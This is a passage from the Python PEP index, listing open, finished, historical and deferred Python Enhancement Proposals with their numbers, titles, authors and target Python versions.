S 718 | Subscriptable functions | James Hilton-Balfe | 3.13
I 720 | Cross-compiling Python packages | Filipe Laíns | 3.12
S 725 | Specifying external dependencies in pyproject.toml | Pradyun Gedam, Ralf Gommers
S 727 | Documentation in Annotated Metadata | Sebastián Ramírez | 3.13
S 728 | TypedDict with Typed Extra Items | Zixuan James Li | 3.14
S 736 | Shorthand syntax for keyword arguments at invocation | Joshua Bambrick, Chris Angelico | 3.14
S 739 | Static description file for build details of Python installations | Filipe Laíns | 3.14
S 743 | Add Py_COMPAT_API_VERSION to the Python C API | Victor Stinner, Petr Viktorin | 3.14
I 744 | JIT Compilation | Brandt Bucher, Savannah Ostrowski | 3.13
S 746 | Type checking Annotated metadata | Adrian Garcia Badaracco | 3.14
S 747 | Annotating Type Forms | David Foster, Eric Traut | 3.14
S 748 | A Unified TLS API for Python | Joop van de Pol, William Woodruff | 3.14
S 749 | Implementing PEP 649 | Jelle Zijlstra | 3.14
S 750 | Template Strings | Jim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck | 3.14
S 751 | A file format to record Python dependencies for installation reproducibility | Brett Cannon
S 752 | Implicit namespaces for package repositories | Ofek Lev
P 755 | Implicit namespace policy for PyPI | Ofek Lev
S 758 | Allow except and except* expressions without parentheses | Pablo Galindo, Brett Cannon | 3.14
S 759 | External Wheel Hosting | Barry Warsaw, Ethan Smith
S 763 | Limiting deletions on PyPI | William Woodruff, Alexis Challande
S 765 | Disallow return/break/continue that exit a finally block | Irit Katriel, Alyssa Coghlan | 3.14
I 766 | Explicit Priority Choices Among Multiple Indexes | Michael Sarahan
S 767 | Annotating Read-Only Attributes | Eneg | 3.14
S 768 | Safe external debugger interface for CPython | Pablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic | 3.14
S 777 | How to Re-invent the Wheel | Ethan Smith
S 789 | Preventing task-cancellation bugs by limiting yield in async generators | Zac Hatfield-Dodds, Nathaniel J. Smith | 3.14
P 2026 | Calendar versioning for Python | Hugo van Kemenade | 3.26
+
+
+

Finished PEPs (done, with a stable interface)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
SF 100 | Python Unicode Integration | Marc-André Lemburg | 2.0
SF 201 | Lockstep Iteration | Barry Warsaw | 2.0
SF 202 | List Comprehensions | Barry Warsaw | 2.0
SF 203 | Augmented Assignments | Thomas Wouters | 2.0
SF 205 | Weak References | Fred L. Drake, Jr. | 2.1
SF 207 | Rich Comparisons | Guido van Rossum, David Ascher | 2.1
SF 208 | Reworking the Coercion Model | Neil Schemenauer, Marc-André Lemburg | 2.1
SF 214 | Extended Print Statement | Barry Warsaw | 2.0
SF 217 | Display Hook for Interactive Use | Moshe Zadka | 2.1
SF 218 | Adding a Built-In Set Object Type | Greg Wilson, Raymond Hettinger | 2.2
SF 221 | Import As | Thomas Wouters | 2.0
SF 223 | Change the Meaning of \x Escapes | Tim Peters | 2.0
SF 227 | Statically Nested Scopes | Jeremy Hylton | 2.1
SF 229 | Using Distutils to Build Python | A.M. Kuchling | 2.1
SF 230 | Warning Framework | Guido van Rossum | 2.1
SF 232 | Function Attributes | Barry Warsaw | 2.1
SF 234 | Iterators | Ka-Ping Yee, Guido van Rossum | 2.1
SF 235 | Import on Case-Insensitive Platforms | Tim Peters | 2.1
SF 236 | Back to the __future__ | Tim Peters | 2.1
SF 237 | Unifying Long Integers and Integers | Moshe Zadka, Guido van Rossum | 2.2
SF 238 | Changing the Division Operator | Moshe Zadka, Guido van Rossum | 2.2
SF 250 | Using site-packages on Windows | Paul Moore | 2.2
SF 252 | Making Types Look More Like Classes | Guido van Rossum | 2.2
SF 253 | Subtyping Built-in Types | Guido van Rossum | 2.2
SF 255 | Simple Generators | Neil Schemenauer, Tim Peters, Magnus Lie Hetland | 2.2
SF 260 | Simplify xrange() | Guido van Rossum | 2.2
SF 261 | Support for “wide” Unicode characters | Paul Prescod | 2.2
SF 263 | Defining Python Source Code Encodings | Marc-André Lemburg, Martin von Löwis | 2.3
SF 264 | Future statements in simulated shells | Michael Hudson | 2.2
SF 273 | Import Modules from Zip Archives | James C. Ahlstrom | 2.3
SF 274 | Dict Comprehensions | Barry Warsaw | 2.7, 3.0
SF 277 | Unicode file name support for Windows NT | Neil Hodgson | 2.3
SF 278 | Universal Newline Support | Jack Jansen | 2.3
SF 279 | The enumerate() built-in function | Raymond Hettinger | 2.3
SF 282 | A Logging System | Vinay Sajip, Trent Mick | 2.3
SF 285 | Adding a bool type | Guido van Rossum | 2.3
SF 289 | Generator Expressions | Raymond Hettinger | 2.4
SF 292 | Simpler String Substitutions | Barry Warsaw | 2.4
SF 293 | Codec Error Handling Callbacks | Walter Dörwald | 2.3
SF 301 | Package Index and Metadata for Distutils | Richard Jones | 2.3
SF 302 | New Import Hooks | Just van Rossum, Paul Moore | 2.3
SF 305 | CSV File API | Kevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells | 2.3
SF 307 | Extensions to the pickle protocol | Guido van Rossum, Tim Peters | 2.3
SF 308 | Conditional Expressions | Guido van Rossum, Raymond Hettinger | 2.5
SF 309 | Partial Function Application | Peter Harris | 2.5
SF 311 | Simplified Global Interpreter Lock Acquisition for Extensions | Mark Hammond | 2.3
SF 318 | Decorators for Functions and Methods | Kevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter | 2.4
SF 322 | Reverse Iteration | Raymond Hettinger | 2.4
SF 324 | subprocess - New process module | Peter Astrand | 2.4
SF 327 | Decimal Data Type | Facundo Batista | 2.4
SF 328 | Imports: Multi-Line and Absolute/Relative | Aahz | 2.4, 2.5, 2.6
SF 331 | Locale-Independent Float/String Conversions | Christian R. Reis | 2.4
SF 338 | Executing modules as scripts | Alyssa Coghlan | 2.5
SF 341 | Unifying try-except and try-finally | Georg Brandl | 2.5
SF 342 | Coroutines via Enhanced Generators | Guido van Rossum, Phillip J. Eby | 2.5
SF 343 | The “with” Statement | Guido van Rossum, Alyssa Coghlan | 2.5
SF 352 | Required Superclass for Exceptions | Brett Cannon, Guido van Rossum | 2.5
SF 353 | Using ssize_t as the index type | Martin von Löwis | 2.5
SF 357 | Allowing Any Object to be Used for Slicing | Travis Oliphant | 2.5
SF 358 | The “bytes” Object | Neil Schemenauer, Guido van Rossum | 2.6, 3.0
SF 362 | Function Signature Object | Brett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings | 3.3
SF 366 | Main module explicit relative imports | Alyssa Coghlan | 2.6, 3.0
SF 370 | Per user site-packages directory | Christian Heimes | 2.6, 3.0
SF 371 | Addition of the multiprocessing package to the standard library | Jesse Noller, Richard Oudkerk | 2.6, 3.0
SF 372 | Adding an ordered dictionary to collections | Armin Ronacher, Raymond Hettinger | 2.7, 3.1
SF 376 | Database of Installed Python Distributions | Tarek Ziadé | 2.7, 3.2
SF 378 | Format Specifier for Thousands Separator | Raymond Hettinger | 2.7, 3.1
SF 380 | Syntax for Delegating to a Subgenerator | Gregory Ewing | 3.3
SF 383 | Non-decodable Bytes in System Character Interfaces | Martin von Löwis | 3.1
SF 384 | Defining a Stable ABI | Martin von Löwis | 3.2
SF 389 | argparse - New Command Line Parsing Module | Steven Bethard | 2.7, 3.2
SF 391 | Dictionary-Based Configuration For Logging | Vinay Sajip | 2.7, 3.2
SF 393 | Flexible String Representation | Martin von Löwis | 3.3
SF 397 | Python launcher for Windows | Mark Hammond, Martin von Löwis | 3.3
SF 405 | Python Virtual Environments | Carl Meyer | 3.3
SF 409 | Suppressing exception context | Ethan Furman | 3.3
SF 412 | Key-Sharing Dictionary | Mark Shannon | 3.3
SF 414 | Explicit Unicode Literal for Python 3.3 | Armin Ronacher, Alyssa Coghlan | 3.3
SF 415 | Implement context suppression with exception attributes | Benjamin Peterson | 3.3
SF 417 | Including mock in the Standard Library | Michael Foord | 3.3
SF 418 | Add monotonic time, performance counter, and process time functions | Cameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner | 3.3
SF 420 | Implicit Namespace Packages | Eric V. Smith | 3.3
SF 421 | Adding sys.implementation | Eric Snow | 3.3
SF 424 | A method for exposing a length hint | Alex Gaynor | 3.4
SF 425 | Compatibility Tags for Built Distributions | Daniel Holth | 3.4
SF 427 | The Wheel Binary Package Format 1.0 | Daniel Holth
SF 428 | The pathlib module – object-oriented filesystem paths | Antoine Pitrou | 3.4
SF 435 | Adding an Enum type to the Python standard library | Barry Warsaw, Eli Bendersky, Ethan Furman | 3.4
SF 436 | The Argument Clinic DSL | Larry Hastings | 3.4
SF 440 | Version Identification and Dependency Specification | Alyssa Coghlan, Donald Stufft
SF 441 | Improving Python ZIP Application Support | Daniel Holth, Paul Moore | 3.5
SF 442 | Safe object finalization | Antoine Pitrou | 3.4
SF 443 | Single-dispatch generic functions | Łukasz Langa | 3.4
SF 445 | Add new APIs to customize Python memory allocators | Victor Stinner | 3.4
SF 446 | Make newly created file descriptors non-inheritable | Victor Stinner | 3.4
SF 448 | Additional Unpacking Generalizations | Joshua Landau | 3.5
SF 450 | Adding A Statistics Module To The Standard Library | Steven D’Aprano | 3.4
SF 451 | A ModuleSpec Type for the Import System | Eric Snow | 3.4
SF 453 | Explicit bootstrapping of pip in Python installations | Donald Stufft, Alyssa Coghlan
SF 454 | Add a new tracemalloc module to trace Python memory allocations | Victor Stinner | 3.4
SF 456 | Secure and interchangeable hash algorithm | Christian Heimes | 3.4
SF 461 | Adding % formatting to bytes and bytearray | Ethan Furman | 3.5
SF 465 | A dedicated infix operator for matrix multiplication | Nathaniel J. Smith | 3.5
SF 466 | Network Security Enhancements for Python 2.7.x | Alyssa Coghlan | 2.7.9
SF 468 | Preserving the order of **kwargs in a function. | Eric Snow | 3.6
SF 471 | os.scandir() function – a better and faster directory iterator | Ben Hoyt | 3.5
SF 475 | Retry system calls failing with EINTR | Charles-François Natali, Victor Stinner | 3.5
SF 476 | Enabling certificate verification by default for stdlib http clients | Alex Gaynor | 2.7.9, 3.4.3, 3.5
SF 477 | Backport ensurepip (PEP 453) to Python 2.7 | Donald Stufft, Alyssa Coghlan
SF 479 | Change StopIteration handling inside generators | Chris Angelico, Guido van Rossum | 3.5
SF 484 | Type Hints | Guido van Rossum, Jukka Lehtosalo, Łukasz Langa | 3.5
SF 485 | A Function for testing approximate equality | Christopher Barker | 3.5
SF 486 | Make the Python Launcher aware of virtual environments | Paul Moore | 3.5
SF 487 | Simpler customisation of class creation | Martin Teichmann | 3.6
SF 488 | Elimination of PYO files | Brett Cannon | 3.5
SF 489 | Multi-phase extension module initialization | Petr Viktorin, Stefan Behnel, Alyssa Coghlan | 3.5
SF 492 | Coroutines with async and await syntax | Yury Selivanov | 3.5
SF 493 | HTTPS verification migration tools for Python 2.7 | Alyssa Coghlan, Robert Kuska, Marc-André Lemburg | 2.7.12
SF 495 | Local Time Disambiguation | Alexander Belopolsky, Tim Peters | 3.6
SF 498 | Literal String Interpolation | Eric V. Smith | 3.6
SF 503 | Simple Repository API | Donald Stufft
SF 506 | Adding A Secrets Module To The Standard Library | Steven D’Aprano | 3.6
SF 508 | Dependency specification for Python Software Packages | Robert Collins
SF 515 | Underscores in Numeric Literals | Georg Brandl, Serhiy Storchaka | 3.6
SF 517 | A build-system independent format for source trees | Nathaniel J. Smith, Thomas Kluyver
SF 518 | Specifying Minimum Build System Requirements for Python Projects | Brett Cannon, Nathaniel J. Smith, Donald Stufft
SF 519 | Adding a file system path protocol | Brett Cannon, Koos Zevenhoven | 3.6
SF 520 | Preserving Class Attribute Definition Order | Eric Snow | 3.6
SF 523 | Adding a frame evaluation API to CPython | Brett Cannon, Dino Viehland | 3.6
SF 524 | Make os.urandom() blocking on Linux | Victor Stinner | 3.6
SF 525 | Asynchronous Generators | Yury Selivanov | 3.6
SF 526 | Syntax for Variable Annotations | Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum | 3.6
SF 527 | Removing Un(der)used file types/extensions on PyPI | Donald Stufft
SF 528 | Change Windows console encoding to UTF-8 | Steve Dower | 3.6
SF 529 | Change Windows filesystem encoding to UTF-8 | Steve Dower | 3.6
SF 530 | Asynchronous Comprehensions | Yury Selivanov | 3.6
SF 538 | Coercing the legacy C locale to a UTF-8 based locale | Alyssa Coghlan | 3.7
SF 539 | A New C-API for Thread-Local Storage in CPython | Erik M. Bray, Masayuki Yamamoto | 3.7
SF 540 | Add a new UTF-8 Mode | Victor Stinner | 3.7
SF 544 | Protocols: Structural subtyping (static duck typing) | Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa | 3.8
SF 552 | Deterministic pycs | Benjamin Peterson | 3.7
SF 553 | Built-in breakpoint() | Barry Warsaw | 3.7
SF 557 | Data Classes | Eric V. Smith | 3.7
SF 560 | Core support for typing module and generic types | Ivan Levkivskyi | 3.7
SF 561 | Distributing and Packaging Type Information | Ethan Smith | 3.7
SF 562 | Module __getattr__ and __dir__ | Ivan Levkivskyi | 3.7
SF 564 | Add new time functions with nanosecond resolution | Victor Stinner | 3.7
SF 565 | Show DeprecationWarning in __main__ | Alyssa Coghlan | 3.7
SF 566 | Metadata for Python Software Packages 2.1 | Dustin Ingram | 3.x
SF 567 | Context Variables | Yury Selivanov | 3.7
SF 570 | Python Positional-Only Parameters | Larry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele | 3.8
SF 572 | Assignment Expressions | Chris Angelico, Tim Peters, Guido van Rossum | 3.8
SF 573 | Module State Access from C Extension Methods | Petr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch | 3.9
SF 574 | Pickle protocol 5 with out-of-band data | Antoine Pitrou | 3.8
SF 578 | Python Runtime Audit Hooks | Steve Dower | 3.8
SF 584 | Add Union Operators To dict | Steven D’Aprano, Brandt Bucher | 3.9
SF 585 | Type Hinting Generics In Standard Collections | Łukasz Langa | 3.9
SF 586 | Literal Types | Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo | 3.8
SF 587 | Python Initialization Configuration | Victor Stinner, Alyssa Coghlan | 3.8
SF 589 | TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys | Jukka Lehtosalo | 3.8
SF 591 | Adding a final qualifier to typing | Michael J. Sullivan, Ivan Levkivskyi | 3.8
SF 592 | Adding “Yank” Support to the Simple API | Donald Stufft
SF 593 | Flexible function and variable annotations | Till Varoquaux, Konstantin Kashin | 3.9
SF 594 | Removing dead batteries from the standard library | Christian Heimes, Brett Cannon | 3.11
SF 597 | Add optional EncodingWarning | Inada Naoki | 3.10
SF 600 | Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions | Nathaniel J. Smith, Thomas Kluyver
SF 604 | Allow writing union types as X | Y | Philippe PRADOS, Maggie Moss | 3.10
SF 610 | Recording the Direct URL Origin of installed distributions | Stéphane Bidoul, Chris Jerdonek
SF 612 | Parameter Specification Variables | Mark Mendoza | 3.10
SF 613 | Explicit Type Aliases | Shannon Zhu | 3.10
SF 614 | Relaxing Grammar Restrictions On Decorators | Brandt Bucher | 3.9
SF 615 | Support for the IANA Time Zone Database in the Standard Library | Paul Ganssle | 3.9
SF 616 | String methods to remove prefixes and suffixes | Dennis Sweeney | 3.9
SF 617 | New PEG parser for CPython | Guido van Rossum, Pablo Galindo, Lysandros Nikolaou | 3.9
SF 618 | Add Optional Length-Checking To zip | Brandt Bucher | 3.10
SF 621 | Storing project metadata in pyproject.toml | Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SF 623 | Remove wstr from Unicode | Inada Naoki | 3.10
SF 624 | Remove Py_UNICODE encoder APIs | Inada Naoki | 3.11
SF 626 | Precise line numbers for debugging and other tools. | Mark Shannon | 3.10
SF 627 | Recording installed projects | Petr Viktorin
SF 628 | Add math.tau | Alyssa Coghlan | 3.6
SF 629 | Versioning PyPI’s Simple API | Donald Stufft
SF 632 | Deprecate distutils module | Steve Dower | 3.10
SF 634 | Structural Pattern Matching: Specification | Brandt Bucher, Guido van Rossum | 3.10
SF 643 | Metadata for Package Source Distributions | Paul Moore
SF 644 | Require OpenSSL 1.1.1 or newer | Christian Heimes | 3.10
SF 646 | Variadic Generics | Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles | 3.11
SF 647 | User-Defined Type Guards | Eric Traut | 3.10
SF 652 | Maintaining the Stable ABI | Petr Viktorin | 3.10
SF 654 | Exception Groups and except* | Irit Katriel, Yury Selivanov, Guido van Rossum | 3.11
SF 655 | Marking individual TypedDict items as required or potentially-missing | David Foster | 3.11
SF 656 | Platform Tag for Linux Distributions Using Musl | Tzu-ping Chung
SF 657 | Include Fine Grained Error Locations in Tracebacks | Pablo Galindo, Batuhan Taskaya, Ammar Askar | 3.11
SF 660 | Editable installs for pyproject.toml based builds (wheel based) | Daniel Holth, Stéphane Bidoul
SF 667 | Consistent views of namespaces | Mark Shannon, Tian Gao | 3.13
SF 669 | Low Impact Monitoring for CPython | Mark Shannon | 3.12
SF 670 | Convert macros to functions in the Python C API | Erlend Egeberg Aasland, Victor Stinner | 3.11
SF 673 | Self Type | Pradeep Kumar Srinivasan, James Hilton-Balfe | 3.11
SF 675 | Arbitrary Literal String Type | Pradeep Kumar Srinivasan, Graham Bleaney | 3.11
SF 678 | Enriching Exceptions with Notes | Zac Hatfield-Dodds | 3.11
SF 680 | tomllib: Support for Parsing TOML in the Standard Library | Taneli Hukkinen, Shantanu Jain | 3.11
SF 681 | Data Class Transforms | Erik De Bonte, Eric Traut | 3.11
SF 682 | Format Specifier for Signed Zero | John Belmonte | 3.11
SF 683 | Immortal Objects, Using a Fixed Refcount | Eric Snow, Eddie Elizondo | 3.12
SF 684 | A Per-Interpreter GIL | Eric Snow | 3.12
SF 688 | Making the buffer protocol accessible in Python | Jelle Zijlstra | 3.12
SF 689 | Unstable C API tier | Petr Viktorin | 3.12
SF 692 | Using TypedDict for more precise **kwargs typing | Franek Magiera | 3.12
SF 695 | Type Parameter Syntax | Eric Traut | 3.12
SF 696 | Type Defaults for Type Parameters | James Hilton-Balfe | 3.13
SF 697 | Limited C API for Extending Opaque Types | Petr Viktorin | 3.12
SF 698 | Override Decorator for Static Typing | Steven Troxler, Joshua Xu, Shannon Zhu | 3.12
SF 700 | Additional Fields for the Simple API for Package Indexes | Paul Moore
SF 702 | Marking deprecations using the type system | Jelle Zijlstra | 3.13
SF 705 | TypedDict: Read-only items | Alice Purcell | 3.13
SF 706 | Filter for tarfile.extractall | Petr Viktorin | 3.12
SF 709 | Inlined comprehensions | Carl Meyer | 3.12
SF 715 | Disabling bdist_egg distribution uploads on PyPI | William Woodruff
SF 721 | Using tarfile.data_filter for source distribution extraction | Petr Viktorin | 3.12
SF 723 | Inline script metadata | Ofek Lev
SF 730 | Adding iOS as a supported platform | Russell Keith-Magee | 3.13
SF 737 | C API to format a type fully qualified name | Victor Stinner | 3.13
SF 738 | Adding Android as a supported platform | Malcolm Smith | 3.13
SF 740 | Index support for digital attestations | William Woodruff, Facundo Tuesca, Dustin Ingram
SF 741 | Python Configuration C API | Victor Stinner | 3.14
SF 742 | Narrowing types with TypeIs | Jelle Zijlstra | 3.13
SF 757 | C API to import-export Python integers | Sergey B Kirpichev, Victor Stinner | 3.14
SF 3101 | Advanced String Formatting | Talin | 3.0
SF 3102 | Keyword-Only Arguments | Talin | 3.0
SF 3104 | Access to Names in Outer Scopes | Ka-Ping Yee | 3.0
SF 3105 | Make print a function | Georg Brandl | 3.0
SF 3106 | Revamping dict.keys(), .values() and .items() | Guido van Rossum | 3.0
SF 3107 | Function Annotations | Collin Winter, Tony Lownds | 3.0
SF 3108 | Standard Library Reorganization | Brett Cannon | 3.0
SF 3109 | Raising Exceptions in Python 3000 | Collin Winter | 3.0
SF 3110 | Catching Exceptions in Python 3000 | Collin Winter | 3.0
SF 3111 | Simple input built-in in Python 3000 | Andre Roberge | 3.0
SF 3112 | Bytes literals in Python 3000 | Jason Orendorff | 3.0
SF 3113 | Removal of Tuple Parameter Unpacking | Brett Cannon | 3.0
SF 3114 | Renaming iterator.next() to iterator.__next__() | Ka-Ping Yee | 3.0
SF 3115 | Metaclasses in Python 3000 | Talin | 3.0
SF 3116 | New I/O | Daniel Stutzbach, Guido van Rossum, Mike Verdone | 3.0
SF 3118 | Revising the buffer protocol | Travis Oliphant, Carl Banks | 3.0
SF 3119 | Introducing Abstract Base Classes | Guido van Rossum, Talin | 3.0
SF 3120 | Using UTF-8 as the default source encoding | Martin von Löwis | 3.0
SF 3121 | Extension Module Initialization and Finalization | Martin von Löwis | 3.0
SF 3123 | Making PyObject_HEAD conform to standard C | Martin von Löwis | 3.0
SF 3127 | Integer Literal Support and Syntax | Patrick Maupin | 3.0
SF 3129 | Class Decorators | Collin Winter | 3.0
SF 3131 | Supporting Non-ASCII Identifiers | Martin von Löwis | 3.0
SF 3132 | Extended Iterable Unpacking | Georg Brandl | 3.0
SF 3134 | Exception Chaining and Embedded Tracebacks | Ka-Ping Yee | 3.0
SF 3135 | New Super | Calvin Spealman, Tim Delaney, Lie Ryan | 3.0
SF 3137 | Immutable Bytes and Mutable Buffer | Guido van Rossum | 3.0
SF 3138 | String representation in Python 3000 | Atsuo Ishimoto | 3.0
SF 3141 | A Type Hierarchy for Numbers | Jeffrey Yasskin | 3.0
SF 3144 | IP Address Manipulation Library for the Python Standard Library | Peter Moody | 3.3
SF 3147 | PYC Repository Directories | Barry Warsaw | 3.2
SF 3148 | futures - execute computations asynchronously | Brian Quinlan | 3.2
SF 3149 | ABI version tagged .so files | Barry Warsaw | 3.2
SF 3151 | Reworking the OS and IO exception hierarchy | Antoine Pitrou | 3.3
SF 3154 | Pickle protocol version 4 | Antoine Pitrou | 3.4
SF 3155 | Qualified name for classes and functions | Antoine Pitrou | 3.3
SF 3156 | Asynchronous IO Support Rebooted: the “asyncio” Module | Guido van Rossum | 3.3
+
+
+

Historical Meta-PEPs and Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
PS 5 | Guidelines for Language Evolution | Paul Prescod
PS 6 | Bug Fix Releases | Aahz, Anthony Baxter
IF 160 | Python 1.6 Release Schedule | Fred L. Drake, Jr. | 1.6
IF 200 | Python 2.0 Release Schedule | Jeremy Hylton | 2.0
IF 226 | Python 2.1 Release Schedule | Jeremy Hylton | 2.1
IF 251 | Python 2.2 Release Schedule | Barry Warsaw, Guido van Rossum | 2.2
IF 283 | Python 2.3 Release Schedule | Guido van Rossum | 2.3
IF 320 | Python 2.4 Release Schedule | Barry Warsaw, Raymond Hettinger, Anthony Baxter | 2.4
PF 347 | Migrating the Python CVS to Subversion | Martin von Löwis
IF 356 | Python 2.5 Release Schedule | Neal Norwitz, Guido van Rossum, Anthony Baxter | 2.5
PF 360 | Externally Maintained Packages | Brett Cannon
IF 361 | Python 2.6 and 3.0 Release Schedule | Neal Norwitz, Barry Warsaw | 2.6, 3.0
IF 373 | Python 2.7 Release Schedule | Benjamin Peterson | 2.7
PF 374 | Choosing a distributed VCS for the Python project | Brett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman
IF 375 | Python 3.1 Release Schedule | Benjamin Peterson | 3.1
PF 385 | Migrating from Subversion to Mercurial | Dirkjan Ochtman, Antoine Pitrou, Georg Brandl
IF 392 | Python 3.2 Release Schedule | Georg Brandl | 3.2
IF 398 | Python 3.3 Release Schedule | Georg Brandl | 3.3
IF 404 | Python 2.8 Un-release Schedule | Barry Warsaw | 2.8
IF 429 | Python 3.4 Release Schedule | Larry Hastings | 3.4
PS 438 | Transitioning to release-file hosting on PyPI | Holger Krekel, Carl Meyer
PF 449 | Removal of the PyPI Mirror Auto Discovery and Naming Scheme | Donald Stufft
PF 464 | Removal of the PyPI Mirror Authenticity API | Donald Stufft
PF 470 | Removing External Hosting Support on PyPI | Donald Stufft
IF 478 | Python 3.5 Release Schedule | Larry Hastings | 3.5
IF 494 | Python 3.6 Release Schedule | Ned Deily | 3.6
PF 512 | Migrating from hg.python.org to GitHub | Brett Cannon
IF 537 | Python 3.7 Release Schedule | Ned Deily | 3.7
PF 541 | Package Index Name Retention | Łukasz Langa
IF 569 | Python 3.8 Release Schedule | Łukasz Langa | 3.8
PF 581 | Using GitHub Issues for CPython | Mariatta
PF 3000 | Python 3000 | Guido van Rossum
PF 3002 | Procedure for Backwards-Incompatible Changes | Steven Bethard
PF 3003 | Python Language Moratorium | Brett Cannon, Jesse Noller, Guido van Rossum
PF 3099 | Things that will Not Change in Python 3000 | Georg Brandl
PF 3100 | Miscellaneous Python 3.0 Plans | Brett Cannon
PF 8001 | Python Governance Voting Process | Brett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
+
+
+

Deferred PEPs (postponed pending further research or updates)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
SD 213 | Attribute Access Handlers | Paul Prescod | 2.1
SD 219 | Stackless Python | Gordon McMillan | 2.1
SD 222 | Web Library Enhancements | A.M. Kuchling | 2.1
SD 233 | Python Online Help | Paul Prescod | 2.1
SD 267 | Optimized Access to Module Namespaces | Jeremy Hylton | 2.2
SD 269 | Pgen Module for Python | Jonathan Riehl | 2.2
SD 280 | Optimizing access to globals | Guido van Rossum | 2.3
SD 286 | Enhanced Argument Tuples | Martin von Löwis | 2.3
SD 312 | Simple Implicit Lambda | Roman Suzi, Alex Martelli | 2.4
SD 316 | Programming by Contract for Python | Terence Way
SD 323 | Copyable Iterators | Alex Martelli | 2.5
SD 337 | Logging Usage in the Standard Library | Michael P. Dubner | 2.5
